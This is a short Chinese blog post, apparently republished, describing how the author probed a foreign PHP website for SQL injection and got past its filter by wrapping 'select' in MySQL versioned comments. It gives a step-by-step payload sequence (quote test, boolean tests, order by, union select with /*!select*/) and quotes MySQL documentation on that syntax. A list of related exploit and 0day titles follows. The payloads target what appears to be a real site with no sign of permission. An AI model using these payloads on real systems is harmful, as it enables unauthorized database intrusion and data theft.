Mysql利用/*!select*/ 突破防注入
来源:互联网 发布:周末网络个人理财申请 编辑:程序博客网 时间:2024/06/03 17:00
文/meao
昨天在检测一个外国PHP网站时
在id=255后加’出现forbidden
于是我and 1=1正常 and 1=2出错
说明肯定有注入
接着我order by猜出字段
然后union select 1,2,3,4 //悲剧的又出现了forbidden
肯定是做了过滤了
后来构造了语句id=-255+union+/*!select*/+1,2,3,4
引用MySQL Server supports some variants of C-style comments. These enable you to write code that includes MySQL extensions, but is still portable, by using comments of the following form:
/*! MySQL-specific code */
In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement, but other SQL servers will ignore the extensions. For example, MySQL Server recognizes the STRAIGHT_JOIN keyword in the following statement, but other servers will not:
SELECT /*! STRAIGHT_JOIN */ col1 FROM table1,table2 WHERE …
If you add a version number after the “!” character, the syntax within the comment is executed only if the MySQL version is greater than or equal to the specified version number. The TEMPORARY keyword in the following comment is executed only by servers from MySQL 3.23.02 or higher:
CREATE /*!32302 TEMPORARY */ TABLE t (a INT);
The comment syntax just described applies to how the mysqld server parses SQL statements. The mysql client program also performs some parsing of statements before sending them to the server. (It does this to determine statement boundaries within a multiple-statement input line.
)
mysql> select 1 union/*!select*/version();
+-----------+
| 1 |
+-----------+
| 1 |
| 5.0.82sp1 |
+-----------+
2 rows in set (0.00 sec)
- Mysql利用/*!select*/ 突破防注入
- /*!select*/ 突破防注入
- PHP利用PDO实现mysql防注入
- 突破Sql防注入过滤
- PHP mysql防注入
- PHP防MYSQL注入
- mysql防注入
- mysql防注入函数
- mysql防sql注入
- mysql防注入函数
- MySql防注入
- mysql注入对and or的过滤及uinon select等过滤的一个方法突破
- mysql注入对and or的过滤及uinon select等过滤的一个方法突破
- mysql注入对and or的过滤及uinon select等过滤的一个方法突破
- mysql防注入攻击解决办法
- 利用HttpModule实现防sql注入
- 【转】突破sql 注入过滤Union+SELECT 继续射下去
- 突破sql 注入过滤Union+SELECT 继续射下去
- 工作总结
- 算法导论 归并排序解决逆序数
- ORACLE使用触发器更新数据
- Struts2+Spring2+Hibernate3整合
- static的作用
- Mysql利用/*!select*/ 突破防注入
- 域内计算机和用户获取
- 一份比较详细的DOS命令说明!
- 另类抓win hash法
- 最新Discuz! X1- 1.5 exp -2011 dz论坛通杀 0DAY
- syWebEditor编辑器最新0day
- DedeCMS 支付页面注入漏洞
- 5UCMS漏洞利用
- 赋值运算符重载函数